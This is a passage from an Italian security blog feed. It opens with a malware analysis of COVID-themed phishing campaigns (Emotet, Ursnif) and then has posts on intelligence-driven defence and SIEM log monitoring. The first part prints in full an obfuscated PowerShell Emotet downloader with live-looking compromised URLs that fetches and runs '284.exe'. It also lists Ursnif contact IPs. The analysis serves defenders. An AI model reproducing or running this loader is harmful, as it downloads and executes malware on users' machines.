&lt;pre&gt;&lt;code&gt;$jrFhA0=&#39;Wf1rHz&#39;;$uUMMLI = &#39;284&#39;;$iBtj49N=&#39;ThMqW8s0&#39;;$FwcAJs6=$env:userprofile+&#39;\&#39;+$uUMMLI+&#39;.exe&#39;;$S9GzRstM=&#39;EFCwnlGz&#39;;$u8UAr3=&amp;amp;(&#39;n&#39;+&#39;ew&#39;+&#39;-object&#39;) NeT.wEBClIEnt;$pLjBqINE=&#39;http://blockchainjoblist.com/wp-admin/014080/@https://womenempowermentpakistan.com/wp-admin/paba5q52/@https://atnimanvilla.com/wp-content/073735/@https://yeuquynhnhai.com/upload/41830/@https://deepikarai.com/js/4bzs6/&#39;.&amp;quot;sPL`iT&amp;quot;(&#39;@&#39;);$l4sJloGw=&#39;zISjEmiP&#39;;foreach($V3hEPMMZ in $pLjBqINE){try{$u8UAr3.&amp;quot;DOw`N`lOaDfi`Le&amp;quot;($V3hEPMMZ, $FwcAJs6);$IvHHwRib=&#39;s5Ts_iP8&#39;;If ((&amp;amp;(&#39;G&#39;+&#39;e&#39;+&#39;t-Item&#39;) $FwcAJs6).&amp;quot;LeN`gTh&amp;quot; -ge 23931) {[Diagnostics.Process]::&amp;quot;ST`ArT&amp;quot;($FwcAJs6);$zDNs8wi=&#39;F3Wwo0&#39;;break;$TTJptXB=&#39;ijlWhCzP&#39;}}catch{}}$vZzi_uAp=&#39;aEBtpj4&#39;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Il codice prova a comunicare con l’IP 181.188.149.134  che è &lt;a href=&#34;https://www.abuseipdb.com/check/181.188.149.134&#34;&gt;&lt;strong&gt;segnalato su AbuseIPDB&lt;/strong&gt;&lt;/a&gt; come CnC server di Emotet da cui prova a scaricare un fila dal nome “284.exe” che,chiaramente, è un eseguibile malevolo.&lt;/p&gt;

&lt;h3 id=&#34;esempio-n-3-ursnif&#34;&gt;Esempio n°3: Ursnif&lt;/h3&gt;

&lt;p&gt;Il terzo malware è &lt;strong&gt;l’ultimo tra i più diffusi, Ursnif&lt;/strong&gt;, veicolato attraverso mail dall’oggetto “Invio COPIA Ordine/Fattura: Procedure x Coronavirus”. La mail invita la vittima a scaricare un file Excel in allegato che, come gli altri, contiene una macro vba.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/ursnif-excel-document.png&#34; alt=&#34;ursnif-excel-document&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Parte del codice offuscato è il seguente:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/ursnif-codice-esploso-sandbox-1.png&#34; alt=&#34;ursnif-codice-esploso-sandbox-1&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Sono presenti vari livelli di compressione (gzip, base64 e dati binari) ma deoffuscando ogni livello ciò che si ottiene è qualcosa che ci permette di comprendere il comportamento della macro.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/ursnif-codice-esploso-sandbox-2.png&#34; alt=&#34;ursnif-codice-esploso-sandbox-2&#34; /&gt;
&lt;img src=&#34;https://blog.cybergon.com/imgs/phishingreport/ursnif-codice-esploso-sandbox-3.png&#34; alt=&#34;ursnif-codice-esploso-sandbox-3&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Il codice prova a contattare differenti IP tra cui:&lt;/p&gt;

&lt;p&gt;23.227.199.36&lt;/p&gt;

&lt;p&gt;52.109.2.16&lt;/p&gt;

&lt;p&gt;72.21.91.29&lt;/p&gt;

&lt;p&gt;15133   US&lt;/p&gt;

&lt;p&gt;52.109.124.20&lt;/p&gt;

&lt;p&gt;Con l’obiettivo ultimo di infettare e diffondere il malware.&lt;/p&gt;

&lt;h3 id=&#34;le-precauzioni-da-adottare&#34;&gt;Le precauzioni da adottare&lt;/h3&gt;

&lt;p&gt;Questi sono tre esempi di malware già noti e tornati alla ribalta anche durante e grazie a questa pandemia.
Non sono però gli unici casi: ricordiamo anche &lt;a href=&#34;https://www.difesaesicurezza.com/cyber/cybercrime-muddywater-sfrutta-il-coronavirus-per-diffondere-blackwater/&#34;&gt;quello di Blackwater&lt;/a&gt; o &lt;a href=&#34;https://www.cert-pa.it/notizie/campagna-malware-android-con-riferimenti-a-inps-e-covid-19/&#34;&gt;la campagna specifiche per utenti Android.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In situazioni come queste, le precauzioni in qualità di utente che consigliamo di adottare sono quelle più semplici ma non per questo banali:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;E’ buona norma controllare l&amp;rsquo;indirizzo del mittente per rendersi conto se sia o meno plausibile sfruttare tool online per verificarne la reputazione nel caso in cui non lo si conosca, ad esempio: &lt;a href=&#34;https://talosintelligence.com/&#34;&gt;Cisco Talos&lt;/a&gt;; &lt;a href=&#34;https://www.senderscore.org/&#34;&gt;Senderscore&lt;/a&gt;; &lt;a href=&#34;https://mxtoolbox.com/&#34;&gt;MxToolbox&lt;/a&gt;;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Non scaricare file in allegato o file a cui si viene condotti tramite link, se proprio necessario sfruttare piattaforme che effettuano gratuitamente l’analisi di file, come &lt;a href=&#34;https://www.virustotal.com/gui/home&#34;&gt;Virustotal&lt;/a&gt;;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Non cliccare link senza essersi prima accertati della bontà dell’e-mail;&lt;/p&gt;&lt;/li&gt;

&lt;li&gt;&lt;p&gt;Chiedere a qualche collega se ha già ricevuto una mail dello stesso tipo o informarsi su Internet circa campagna caratterizzate dallo stesso oggetto dell’e-mail ricevuta.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Hai un attacco in corso? Contattaci su shockwave@cybergon.com&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Cybercrime e Cybersecurity: l&#39;Intelligence come leva per la difesa della tua organizzazione</title>
         <link>https://blog.cybergon.com/posts/cybercrime-e-cybersecurity-intelligence-come-leva-per-la-difesa-della-tua-organizzazione/</link>
         <pubDate>Wed, 01 Apr 2020 10:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Marco Lucchina</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/cybercrime-e-cybersecurity-intelligence-come-leva-per-la-difesa-della-tua-organizzazione/</guid>
         <description>

&lt;p&gt;La crescente, anzi imponente &lt;strong&gt;crescita di importanza dei dati custoditi nei datacenter&lt;/strong&gt; pone a chi si occupa di sistemi informativi una nuova sfida: identificare adeguate strategie di difesa. La Cybersecurity non è solo un effetto collaterale della digitalizzazione, è la sua nemesi anche in ottica di opportunità commerciali.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuoveminacce/intelligence-come-leva-per-la-difesa-della-tua-organizzazione.jpg&#34; alt=&#34;intelligence-come-leva-per-la-difesa-della-tua-organizzazione&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Le tecniche maggiormente adottate e riconducibili alla metodologia di &lt;em&gt;“firefighting”&lt;/em&gt; non sono più adeguate allo scenario attuale. Rispondere ad una minaccia quando questa si manifesta, magari bloccando la disponibilità dei sistemi, lascia le aziende esposte a incalcolabili danni di immagine oltre ai costi dovuti a fermi. Un approccio di questo tipo non permette neppure di sapere quando si è verificata una compromissione degli stessi.&lt;/p&gt;

&lt;p&gt;Sappiamo, inoltre, che &lt;strong&gt;è utopistico ritenere che i sistemi possano essere considerati sicuri&lt;/strong&gt;. Non è neppure affermabile che siano sempre aggiornati. Nei progetti sul campo si incontrano continuamente motivazioni, compromessi secondo i quali un determinato ambiente non può essere aggiornato. A titolo esemplificativo, ma non esaustivo, applicazioni legacy in assenza di un processo di mantenimento, potrebbero richiedere sistemi operativi obsoleti, lasciando esposta una superficie di attacco considerevole.
Contestualmente, le procedure di recovery sono studiate in caso di eventi naturali o blocco dei sistemi, solo in rari casi è prevista l’attivazione d’emergenza della catena di comando in presenza di un attacco o, meglio di una minaccia immediata, anche potenziale. Parallelamente &lt;strong&gt;la consapevolezza del rischio deve essere portata ai massimi livelli aziendali&lt;/strong&gt;. Gli specialisti di sicurezza non sono chiamati ad affrontare ragazzi che si divertono da uno scantinato, bensì organizzazioni con capacità sofisticate,spesso con alle spalle interi governi.&lt;/p&gt;

&lt;p&gt;È proprio il concetto, anche espresso in contingenza, di una minaccia immediata che pone l’etichetta di obsoleto al metodo &lt;em&gt;firefighting&lt;/em&gt;; semplicemente perché se non si è ancora manifestata non può essere presa in considerazione. Dalla speculazione filosofica al pratico, &lt;strong&gt;la strategia di difesa non può essere unica, deve dividersi su più livelli e partire dalla minaccia&lt;/strong&gt;. Per identificarla è necessario comprendere perché qualcuno dovrebbe interessarsi a noi e le modalità secondo le quali veniamo classificati come obiettivo.&lt;/p&gt;

&lt;p&gt;Solo comprendendo le logiche del Cybercrime e attivando una rete di monitoraggio, possiamo adattare la nostra difesa. Una difesa che non sarà basata (solo) sulla capacità di risposta bensì sull’invisibilità. Incorporare capacità di analisi delle capacità, delle dottrine e degli obiettivi è &lt;strong&gt;la base di una difesa guidata dall’Intelligence&lt;/strong&gt; ed è un processo continuo che si basa sull’apprendimento ed il successivo miglioramento delle procedure e delle capacità.&lt;/p&gt;

&lt;h2 id=&#34;apt-advanced-persistent-threat-una-minaccia-continua&#34;&gt;APT – ADVANCED PERSISTENT THREAT: UNA MINACCIA CONTINUA&lt;/h2&gt;

&lt;p&gt;La vita dei Cybercriminali è un po’ più facile della vita di chi si occupa di Cybersecurity. Possiamo affermarlo: sono sempre un passo avanti, mentre gli specialisti della sicurezza devono lavorare seguendo un protocollo di identificazione delle minacce e conseguente risposta. Dobbiamo la conoscenza di gran parte delle informazioni riportate, qui come sulla stampa specializzata, al &lt;em&gt;Dottor McGuire&lt;/em&gt;. Il proposito del ricercatore è di rendere non tanto il nostro lavoro un po’ più facile, ma il loro un po’ più difficile. Il primo passo in questa direzione deve essere, quindi, &lt;strong&gt;la comprensione e la consapevolezza della minaccia&lt;/strong&gt;, che dobbiamo considerare persistente e di alto livello tecnico.&lt;/p&gt;

&lt;h3 id=&#34;cybercrime-e-cybersecurity-due-industrie-a-confronto&#34;&gt;Cybercrime e cybersecurity: due industrie a confronto&lt;/h3&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuoveminacce/cybercrime-cybersecurity-due-industrie-a-confronto.PNG&#34; alt=&#34;cybercrime-cybersecurity-due-industrie-a-confronto&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Nel &amp;ldquo;campo nemico&amp;rdquo; si sono organizzati come una fiorente economia: è possibile acquistare exploit (codici che sfruttano vulnerabilità), più o meno per qualunque tipo di attacco o ancora, comprare il tempo di uno specialista che scriva o segua l’attacco. Si tratta di una industria fiorente che, pare, dia lavoro a &lt;strong&gt;3,5 milioni di coders&lt;/strong&gt; (programmatori).
E’ un mondo composto da persone curiose, entusiaste e che sono sia innovatori che early adopter di tecnologie.&lt;/p&gt;

&lt;p&gt;Il motore che muove queste persone è il guadagno, esattamente come nelle altre industrie. A questo proposito il progetto &lt;a href=&#34;https://www.bromium.com/wp-content/uploads/2018/05/Into-the-Web-of-Profit_Bromium.pdf&#34;&gt;&lt;em&gt;“The Web of Profit”&lt;/em&gt;&lt;/a&gt; è uno dei maggiori studi realizzati col fine di comprendere le dinamiche del Cybercrime.
La comprensione di queste dinamiche è fondamentale per superare l’approccio di &lt;em&gt;firefighting&lt;/em&gt; tipico delle organizzazioni, ovvero: risolvere il problema quando – spesso – il danno è fatto.
Solo l’analisi degli introiti, rapportati correttamente anche al fattore temporale, può far fare un passo avanti alle &lt;strong&gt;strategie di difesa, che non possono fare a meno di un approccio adattivo&lt;/strong&gt;: partire dall’individuazione delle fonti di ricavo più interessanti e da un immediato aggiornamento degli strumenti di difesa per rendere quanto meno antieconomico l’utilizzo dei propri asset a quei fini. &lt;a href=&#34;https://cybergon.com/blog/posts/averagesecurity/&#34;&gt;(vedi blogpost precedente: The Theory of Average Security)&lt;/a&gt;&lt;/p&gt;

&lt;h3 id=&#34;il-cybercrime-l-economia-di-una-nazione&#34;&gt;Il Cybercrime: l&amp;rsquo;economia di una nazione&lt;/h3&gt;

&lt;p&gt;Dobbiamo quindi organizzare le difese secondo un approccio &lt;em&gt;financially-driven&lt;/em&gt;, &lt;strong&gt;considerando il Cybercrime non come un singolo «business» ma come un’intera economia&lt;/strong&gt;, delle dimensioni di una nazione sviluppata come l’Italia.
Si tratta di un &lt;em&gt;«disruptive business model»&lt;/em&gt; che radica la sua efficacia in alcune capacità:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Un ampio spettro di metodologia per generare ricavi, spesso a livello di industria;&lt;/li&gt;
&lt;li&gt;Monete e modalità di scambio totalmente digitali e anonimi;&lt;/li&gt;
&lt;li&gt;Numerosi intermediari e produttori, fornitore di marci e servizi. Senza dimenticare l’incredibile numero di clienti;&lt;/li&gt;
&lt;li&gt;Marketplace dedicati;&lt;/li&gt;
&lt;li&gt;Meccanismi di distribuzione globale;&lt;/li&gt;
&lt;li&gt;Fabbriche di trolls o di «mass marketing»;&lt;/li&gt;
&lt;li&gt;L’incredibile valore dei dati: oggetto principale degli scambi;&lt;/li&gt;
&lt;li&gt;Presenza in aree con assenza di legislazione specifica;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tutto questo porta ad una macro-suddivisione degli introiti secondo il seguente schema:&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuoveminacce/table-introiti-miliardi.PNG&#34; alt=&#34;table-introiti-miliardi&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Si può osservare quanto &lt;strong&gt;la rivendita di un dato rubato sia la principale fonte di ricavo&lt;/strong&gt;, del resto l’utilizzo di dati rubati è un’attività a basso rischio, soprattutto rispetto al furto originale.
I &lt;em&gt;Ransomware&lt;/em&gt; sono invece la punta dell’iceberg, visibili ai più perché bloccano i sistemi, ma rappresentano solo l’1% dei ricavi.
Le piattaforme dedicate evolute sono funzionali tanto quanto quelle che utilizziamo tutti i giorni: Google, Facebook, Amazon. E funzionano allo stesso modo: si cercano “cose”, si comprano “cose” e si paga con una moneta leggermente differente (nell’oltre 60% dei casi: BitCoin).&lt;/p&gt;

&lt;p&gt;Una volta compreso come i Cybercriminali ottengono i guadagni, è utile capire come vengono riciclati per essere reimmessi nell’economia reale. Si stima che &lt;strong&gt;il 10% dei 2000 miliardi di dollari riciclati nel mondo siano derivanti da questo sistema&lt;/strong&gt;. Questo significa che i Cybercriminali siano piuttosto avvezzi sia ai metodi tradizionali che a quelli più innovativi. Ai classici &lt;em&gt;money mule&lt;/em&gt;, &lt;em&gt;shell companies&lt;/em&gt; e bonifici internazionali si sono aggiunte, nel tempo, tutte le forme di pagamenti digitali con una crescita importante dei trasferimenti di denaro all’interno dei giochi online (incluso PlayStation Network o Xbox online), con il successivo intento di trasformarli in oggetti che possano mantenere il valore nel medio lungo termine (gioielli, proprietà, ecc.).&lt;/p&gt;

&lt;p&gt;CURIOSITÀ: Airbnb è stato spesso utilizzato come lavanderia per gli introiti del Cybercrime, sfruttando alcune legislazioni favorevoli dal punto di vista della fiscalità.&lt;/p&gt;

&lt;h2 id=&#34;kill-chain-reg-methodology-comprendere-l-attacco-per-fermarlo&#34;&gt;KILL CHAIN&amp;reg; METHODOLOGY: COMPRENDERE L’ATTACCO PER FERMARLO&lt;/h2&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuoveminacce/kill-chain-methodology-comprendere-lattacco-per-fermarlo.jpg&#34; alt=&#34;kill-chain-methodology-comprendere-lattacco-per-fermarlo&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Come abbiamo ripetuto fino ad ora per bloccare l’attacco di un Cybercriminale, &lt;strong&gt;la chiave è comprenderne il funzionamento&lt;/strong&gt;. &lt;a href=&#34;https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Gaining_the_Advantage_Cyber_Kill_Chain.pdf&#34;&gt;Il modello introdotto da Lockheed Martin&lt;/a&gt; è identificato come modello &lt;em&gt;“Intelligence Driven Defense®”&lt;/em&gt; e si basa proprio sull’idea di &lt;strong&gt;identificare i passaggi che un attaccante dovrà compiere per forzare il sistema di difesa&lt;/strong&gt;. Una volta identificati i passaggi, bisogna acquisire la capacità di bloccarlo in qualunque fase.&lt;/p&gt;

&lt;p&gt;La base fondante è che la comprensione delle motivazioni e della metodologia che costituiscono l’attacco, sia la componente di Intelligence. Il modello &lt;em&gt;Kill Chain&lt;/em&gt; lavora su differenti livelli e si rifà a &lt;em&gt;“U.S. military targeting doctrine”&lt;/em&gt; che definisce i passaggi del processo: find, fix, track, target, engage, assess (F2T2EA). Consente di identificare i vari passaggi dell’attacco e quindi di comprenderli.&lt;/p&gt;

&lt;p&gt;Le sette fasi della &lt;em&gt;Kill Chain&lt;/em&gt; sono:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Reconnaissance&lt;/strong&gt; – ricerca e identificazione degli obiettivi, spesso attraverso i siti web, gli indirizzi e-mail, le relazioni sociali (e non solo i social network) o le informazioni su specifiche tecnologie;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Weaponization&lt;/strong&gt; – l’accoppiamento tra un trojan con un exploit in un payload. Questo tipicamente significa la creazione di un tool automatico da inserire in un vettore di attacco (arma) come potrebbe essere un PDF o un documento di Microsoft office;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Delivery&lt;/strong&gt; – la trasmissione dell’arma nell’ambiente dell’obiettivo, tipicamente un allegato e-mail, un sito web o un media USB;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exploitation&lt;/strong&gt; – è la fase in cui il codice viene eseguito e identifica il suo obiettivo: una  vulnerabilità di un’applicazione o un sistema operativo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Installation&lt;/strong&gt; – l’installazione di un trojan che permetta accesso remoto o di una backdoor che permettono all’attaccante di operare in modo persistente nell’ambiente della vittima;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Command and Control (C2)&lt;/strong&gt; – tipicamente un oggetto compromesso segnala ad un rete di comando e controllo di essere pronto ad eseguire istruzioni. In questo momento l’attaccante ha le mani nell’infrastruttura della vittima;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Actions on Objectives&lt;/strong&gt; – ora l’attaccante è in grado di compiere delle azioni per conseguire il suo obiettivo iniziale. Può trattarsi di esfiltrazione di dati (dopo averli raccolti e crittografati). In alternativa i sistemi potrebbero essere utilizzati per compromettente altri o per approfittare della potenza di calcolo e della banda per fini vari (es. Crypto-mining);&lt;/li&gt;
&lt;/ol&gt;

&lt;h3 id=&#34;organizzare-la-difesa&#34;&gt;Organizzare la difesa&lt;/h3&gt;

&lt;p&gt;Una difesa basata sull’Intelligence si realizza &lt;strong&gt;adeguando le difese alla catena di eventi che compongono l’attacco&lt;/strong&gt; e facendo in modo di poter interdire la connessione con la minaccia appena viene scoperta a qualunque dei sette livelli descritti.
Il primo livello, quello della raccolta delle informazioni, viene spesso sottovalutato dalle organizzazioni, che preferiscono una condivisione spinta delle informazioni nell’ottica di un ritorno commerciale. Presentazioni e siti web con foto e contatti delle figure apicali sono un esempio in tal senso. Una politica di sicurezza deve bilanciare la spinta commerciale con la riservatezza, però una strategia guidata dall’Intelligence permette di scoprire quanto la pubblicazione di queste informazioni potrebbe essere utile a chi sta studiando un potenziale attacco.&lt;/p&gt;

&lt;p&gt;Ancora una volta, dobbiamo sapere se la nostra organizzazione si configura come target generico o specifico. Nel secondo caso cercano noi per qualche asset in nostro possesso, cosa che dovrebbe far preferire un approccio più riservato. Nel primo caso, invece, possiamo riprodurre la vista di un potenziale attaccante, guardandoci attraverso i suoi stessi tools per scoprire se siamo visibili o invisibili. Il risultante bivio strategico consiglierebbe prudenza in caso di visibilità e magari qualche aggiustamento. A tal proposito dobbiamo ricordare che &lt;strong&gt;la maggior parte delle organizzazioni sono appetibili proprio per le vulnerabilità che espongono&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;security-operation-center-applicare-il-modello-di-intelligence-driven-defense&#34;&gt;SECURITY OPERATION CENTER: APPLICARE IL MODELLO DI INTELLIGENCE DRIVEN DEFENSE&lt;/h2&gt;

&lt;p&gt;Come applicare efficacemente il modello &lt;em&gt;“Intelligence Driven Defense®”&lt;/em&gt; all’operatività di un &lt;em&gt;Security Operation Center&lt;/em&gt;, un SOC?&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/nuoveminacce/security-operation-center-blue-team.jpg&#34; alt=&#34;security-operation-center-blue-team&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Ad oggi non esiste una metodologia ufficiale, esistono però alcune best practice che possono essere adottate, schematizzabili in quattro “funzioni” attivabili all’interno del &lt;em&gt;Blue Team&lt;/em&gt; &lt;a href=&#34;https://csrc.nist.gov/glossary/term/Red_Team_Blue_Team_Approach&#34;&gt;(leggi qui la definizione del National Institute of Standard and Technology)&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ZERO TRUST APPROACH&lt;/strong&gt;: qualunque attività può essere malevole e deve essere analizzata al di fuori del perimetro di difesa. L’approccio implica una profonda revisione architetturale, ma soprattutto culturale: non esistono più ambienti sicuri: tutti possono essere compromessi e non si sa da dove può venire un attacco. Ad esempio i sistemi critici vengono sempre più spesso compromessi a seguito di una perdita di credenziali piuttosto che con complessi attacchi dall’esterno. L’approccio prevede di identificare “isole” che erogano servizi, compartimentarle per escludere lo sfruttamento di vulnerabilità e assicurarsi che le connessioni in ingresso seguano determinate regole;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;REPORT OSINT&lt;/strong&gt;: mirato alla protezione delle credenziali. Monitorare username e password, che siano esposte singolarmente o peggio come componenti della stessa credenziale è un grande aiuto che l’Intelligence da alla prevenzione del furto delle stesse. Il riutilizzo di credenziali è la prima causa della loro compromissione. L’Open Source Intelligence aiuta anche a tracciare i profili delle persone più esposte, fonte degli attacchi mirati, spesso eseguiti dopo una accurata indagine delle informazione sulle figure apicali.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;THREAT MANAGEMENT&lt;/strong&gt;: la prima fonte di attenzione sono le vulnerabilità. Qualunque organizzazione non è in grado di tenere costantemente aggiornato il software, percui è comunque esposta ad un rischio. Sapere quali sono e monitorare l’azione di malware che le sfruttino è uno dei cardini dei sistemi IDD. Confrontare il proprio perimetro di difesa con quello che avviene sulla rete, però dopo che si conoscono le possibili superfici di attacco;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CORRELATION&lt;/strong&gt;: le regole di correlazione hanno l’obiettivo di confrontare gli eventi per determinare cosa è “attività normale” e cosa, invece, è una anomalia. La correlazione è strettamente legata all’operatività di ogni singola isola, le regole devono prima “imparare” e poi possono inziare a produrre risultati.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;È doveroso infine ricordare che l’obiettivo di un SOC, tra gli altri, deve essere la funzione &lt;strong&gt;DETECT ossia la capacità di identificare minacce reali&lt;/strong&gt; in grado di aprire una breccia sui sistemi difensivi. Non esiste una tecnologia tale da sostituire le pratiche che l’esperienza e il continuo miglioramento suggeriscono. Alla fase di detect, segue quella di &lt;strong&gt;RESPOND&lt;/strong&gt; e non è detto che delegando la prima ad una tecnologia la seconda sia aquisibile. Entrambe devono procedere di pari passo e, solitamente, allineate alle competenze del gruppo che le ha in carico.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Log e SIEM: soluzioni per dotarsi di un efficiente sistema di monitoraggio dei sistemi IT</title>
         <link>https://blog.cybergon.com/posts/log-siem-monitoraggio-sistemi-it/</link>
         <pubDate>Mon, 24 Feb 2020 15:46:01 +0000</pubDate>
         <authors>
         
              
             <author>Filadelfio Emanuele</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/log-siem-monitoraggio-sistemi-it/</guid>
         <description>

&lt;p&gt;Ogni dispositivo informatico, ogni applicazione, dal mondo IT fino all’universo IOT genera in modo continuo informazioni, principalmente sotto forma di &lt;em&gt;log&lt;/em&gt;.
All’interno di questo fiume di dati, si nascondono dati molto interessanti che però non è semplice gestire.
Dotarsi di un &lt;em&gt;SIEM&lt;/em&gt; in azienda è un passo dovuto, ma è necessario stabilire gli obiettivi: rispondere ad un requisito normativo o di compliance è diverso rispetto ad un utilizzo in ambito security.
Proviamo ad analizzare tale percorso, partendo dalle esigenze business.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/logesiem/log-siem-monitoraggio-sistemi-it.jpg&#34; alt=&#34;Log-SIEM-monitoraggio-sistemi-it&#34; /&gt;&lt;/p&gt;

&lt;h3 id=&#34;qual-è-l-esigenza-delle-organizzazioni&#34;&gt;Qual è l&amp;rsquo;esigenza delle organizzazioni?&lt;/h3&gt;

&lt;p&gt;L’obiettivo primario per ogni azienda è quello di massimizzare la disponibilità dei propri sistemi IT e, in generale, fare in modo che le business application siano sempre disponibili. È indispensabile permettere al business di avere a disposizione gli strumenti necessari per potere essere competitivi sul mercato. Andiamo ad analizzare alcuni ambiti.&lt;/p&gt;

&lt;p&gt;La forza vendita utilizza un sistema CRM per poter pianificare e monitorare la propria strategia sui clienti. L’indisponibilità dello strumento genera un &lt;strong&gt;potenziale svantaggio competitivo&lt;/strong&gt; sul mercato.
La logistica per poter essere veloce nell’attività di &lt;em&gt;physical delivery&lt;/em&gt; adotta sistemi automatici per la gestione del magazzino. Un guasto potrebbe generare il blocco dell’operatività con possibili conseguenze su movimentazione merci, preparazione ordini e consegne.
La gestione della produzione è basata su sistemi di controllo e supervisione (&lt;em&gt;SCADA&lt;/em&gt;). Questi dispositivi sono parte integrante del processo produttivo e la loro indisponibilità può bloccare l’intera catena.
Non dimentichiamoci dei dispositivi assegnati in modo esclusivo ai collaboratori (smartphone, notebook, tablet) che sono indispensabili per poter &lt;strong&gt;svolgere la propria attività lavorativa&lt;/strong&gt;. Il loro grado di criticità è strettamente legato all’utilizzatore del bene.&lt;/p&gt;

&lt;h3 id=&#34;da-dove-partire-il-system-monitoring&#34;&gt;Da dove partire: il system monitoring&lt;/h3&gt;

&lt;p&gt;Tralasciamo in questo articolo l’analisi della corretta architettura tecnologica che sta alla base dei sistemi IT (ad esempio applicazioni business critical richiederebbero soluzioni di &lt;em&gt;HA&lt;/em&gt;).&lt;/p&gt;

&lt;p&gt;Il primo passo è quello di dotarsi di &lt;strong&gt;sistemi di monitoraggio - system monitoring&lt;/strong&gt; - che verifichino la disponibilità delle applicazioni.&lt;/p&gt;

&lt;p&gt;Gli approcci sono generalmente di due tipologie, spesso utilizzate insieme per massimizzare i risultati.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Bottom-up&lt;/strong&gt;: ogni business application utilizza una struttura di componenti, strettamente dipendenti e interconnessi tra di loro. L’obiettivo è monitorare tutti i componenti, partendo dal basso verso l’alto:

&lt;ul&gt;
&lt;li&gt;Sistemi fisici (server, storage)&lt;/li&gt;
&lt;li&gt;Infrastruttura di rete&lt;/li&gt;
&lt;li&gt;Sistemi di virtualizzazione e sistemi operativi&lt;/li&gt;
&lt;li&gt;Database&lt;/li&gt;
&lt;li&gt;Motori applicativi
Operativamente vengono definiti una lista di indicatori per ogni componente, il cui cambiamento di stato genera un evento (parte guasta, servizio non attivo, risorsa insufficiente).&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Top-down&lt;/strong&gt;: con questo approccio il monitoraggio avviene tramite software intelligenti che simulano l’azione dell’utente e segnalano comportamenti anomali dell’applicazione.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Entrambi gli approcci hanno il limite di &lt;strong&gt;basarsi su indicatori on-off&lt;/strong&gt; (attivo/non attivo; funzionante/guasto) o di soglie predefinite (percentuale di occupazione disco, banda, utilizzo cpu, ram).&lt;/p&gt;

&lt;p&gt;La funzionalità primaria è quella di generare eventi partendo dagli indicatori definiti. A seguito di tale analisi e configurazione, si otterrà uno strumento utile per &lt;strong&gt;ridurre i tempi di gestione di un allarme&lt;/strong&gt; e ridurre l’impatto di un incident sul business.&lt;/p&gt;

&lt;p&gt;Il rischio maggiore è quello di sovradimensionare o sottodimensionare il numero e la tipologia di tali indicatori, generando un effort di gestione ingiustificato da parte del personale IT o, nel caso opposto, di ignorare allarmi che possono generare gravi incident.&lt;/p&gt;

&lt;h3 id=&#34;una-fonte-ricca-di-informazioni-i-log&#34;&gt;Una fonte ricca di informazioni: i log&lt;/h3&gt;

&lt;p&gt;L’attività di &lt;em&gt;system monitoring&lt;/em&gt; ha il grosso limite di fermarsi al controllo degli indicatori che sono stati definiti in fase di analisi, ignorando le fonti che sono per loro natura destrutturate o parzialmente destrutturate.&lt;/p&gt;

&lt;p&gt;Tutti gli oggetti IT, non IT e le applicazioni generano una &lt;strong&gt;grossa quantità di informazioni sotto forma di log&lt;/strong&gt;, raggruppate in diverse categorie e livelli di criticità.&lt;/p&gt;

&lt;p&gt;Per chiarire meglio il concetto, valutiamo alcuni esempi:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Un disco (fisico) che si avvicina al momento del guasto, non genera l’accensione di nessun indicatore ma scrive nei log diagnostici informazioni sugli errori o rallentamenti nelle sue attività di scrittura e lettura. Analizzando tali log sarebbe possibile anticiparne la sostituzione riducendo la probabilità di disservizio.&lt;/li&gt;
